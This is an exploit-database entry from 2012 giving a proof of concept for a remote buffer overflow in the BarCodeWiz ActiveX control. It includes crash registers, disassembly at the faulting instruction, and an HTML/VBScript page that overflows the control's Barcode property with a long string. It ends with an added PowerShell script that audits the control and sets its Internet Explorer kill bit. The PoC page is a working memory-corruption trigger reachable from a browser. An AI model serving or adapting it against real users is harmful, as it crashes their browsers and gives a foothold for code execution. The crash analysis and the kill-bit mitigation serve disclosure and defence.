
BarcodeWiz.dll remote Buffer Overflow PoC

Date: 26 Jul 2012
Reported by: coolkaveh
Type: zdt
Source: 0day.today

Buffer Overflow in BarCodeWiz.dll

Code
Exploit Title: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote Buffer Overflow PoC
Date: July 25, 2012
Author: coolkaveh
Https://twitter.com/coolkaveh
Vendor Homepage: http://barcodewiz.com/
Version: 4.0.0.0
Tested on: windows 7 SP2

awesome coolkaveh 
==========================================================================
Class BarCodeWiz
GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
Number of Interfaces: 1
Default Interface: IWiz
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
--------------------------------------------------------------------------
Registers:
--------------------------------------------------------------------------
EIP 023F8D42
EAX 00000021
EBX 00000ADD
ECX 025A2F58 -> 02439F8C
EDX 00000001
EDI 0046D48C -> 00000068
ESI 025A2F58 -> 02439F8C
EBP 0046D47C -> 0046E48C
ESP 0046D464 -> 025A0AA8


Block Disassembly: 
----------------------------------------------------------------------------
23F8D33	INC EBX
23F8D34	MOV [EBP+8],ECX
23F8D37	PUSH ECX
23F8D38	PUSH DWORD PTR [EBP-8]
23F8D3B	MOV ECX,ESI
23F8D3D	CALL 023F837E
23F8D42	MOV [EDI+EBX*4],EAX	  <--- CRASH
23F8D45	INC EBX
23F8D46	DEC DWORD PTR [EBP-4]
23F8D49	MOV EAX,[EBP-4]
23F8D4C	CMP EAX,[EBP-C]
23F8D4F	JL 023F8C80
23F8D55	JMP 023F8ECE
23F8D5A	MOV EAX,[ESI]
23F8D5C	PUSH EBX


ArgDump:
--------------------------------------------------
EBP+8	00000006
EBP+12	025A2F58 -> 02439F8C
EBP+16	00000068
EBP+20	00000021
EBP+24	00000021
EBP+28	00000021

============================================================================
<html>
Exploit
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll"
prototype  = "Property Let Barcode As String"
memberName = "Barcode"
progid     = "BARCODEWIZLib.BarCodeWiz"
argCount   = 1
arg1=String(14356, "A")
poc.Barcode = arg1
</script>



#  0day.today [2018-01-10]  #
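
The report above lists the control as safe for scripting and initialization with no kill bit set, which is what lets a web page reach the Barcode property from Internet Explorer. The following added example (not part of the original PoC) audits that state for the CLSID shown above and, with the hypothetical -Apply switch, sets the kill bit; the registry paths are the standard Internet Explorer and COM locations, not values from this page.

```powershell
# Added example, not from the original PoC. The CLSID comes from the report
# above; the registry locations are the standard IE / COM ones (assumption).
param([switch]$Apply)      # hypothetical switch: report only unless -Apply is given

$Clsid         = '{CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}'
$KillBit       = 0x400     # "Compatibility Flags" bit: IE refuses to load the control
$SafeForScript = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$SafeForInit   = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForInitializing

# 32-bit IE on 64-bit Windows reads the Wow6432Node view. The PoC path is under
# "Program Files (x86)", so that view matters most here.
$Views = @{ native = 'HKLM:\SOFTWARE'; wow64 = 'HKLM:\SOFTWARE\Wow6432Node' }

function Get-ControlExposure {
    foreach ($v in $Views.GetEnumerator()) {
        if (-not (Test-Path $v.Value)) { continue }          # no WOW64 view on 32-bit Windows
        $cls    = "$($v.Value)\Classes\CLSID\$Clsid"
        $compat = "$($v.Value)\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        $flags  = 0
        if (Test-Path $compat) {
            $p = Get-ItemProperty -Path $compat -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($p) { $flags = [int]$p.'Compatibility Flags' }
        }
        New-Object psobject -Property @{
            View          = $v.Key
            Registered    = Test-Path $cls
            SafeForScript = Test-Path "$cls\Implemented Categories\$SafeForScript"
            SafeForInit   = Test-Path "$cls\Implemented Categories\$SafeForInit"
            Flags         = $flags
            KillBitSet    = [bool]($flags -band $KillBit)
            CompatKey     = $compat
        }
    }
}

$state = @(Get-ControlExposure)
$state | Format-Table View, Registered, SafeForScript, SafeForInit, KillBitSet -AutoSize

if ($Apply) {                                                # requires an elevated session
    foreach ($s in $state | Where-Object { -not $_.KillBitSet }) {
        # Create the key only if missing so existing values are preserved
        if (-not (Test-Path $s.CompatKey)) { New-Item -Path $s.CompatKey -Force | Out-Null }
        New-ItemProperty -Path $s.CompatKey -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ($s.Flags -bor $KillBit) -Force | Out-Null
        Write-Output "Kill bit set in $($s.View) view: $($s.CompatKey)"
    }
}
```

Because the report shows the control also implements IObjectSafety, removing the two category keys alone does not stop it from declaring itself safe at load time; the kill bit is checked before IE instantiates the control at all.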

Vulners AI Score: 7 (High risk)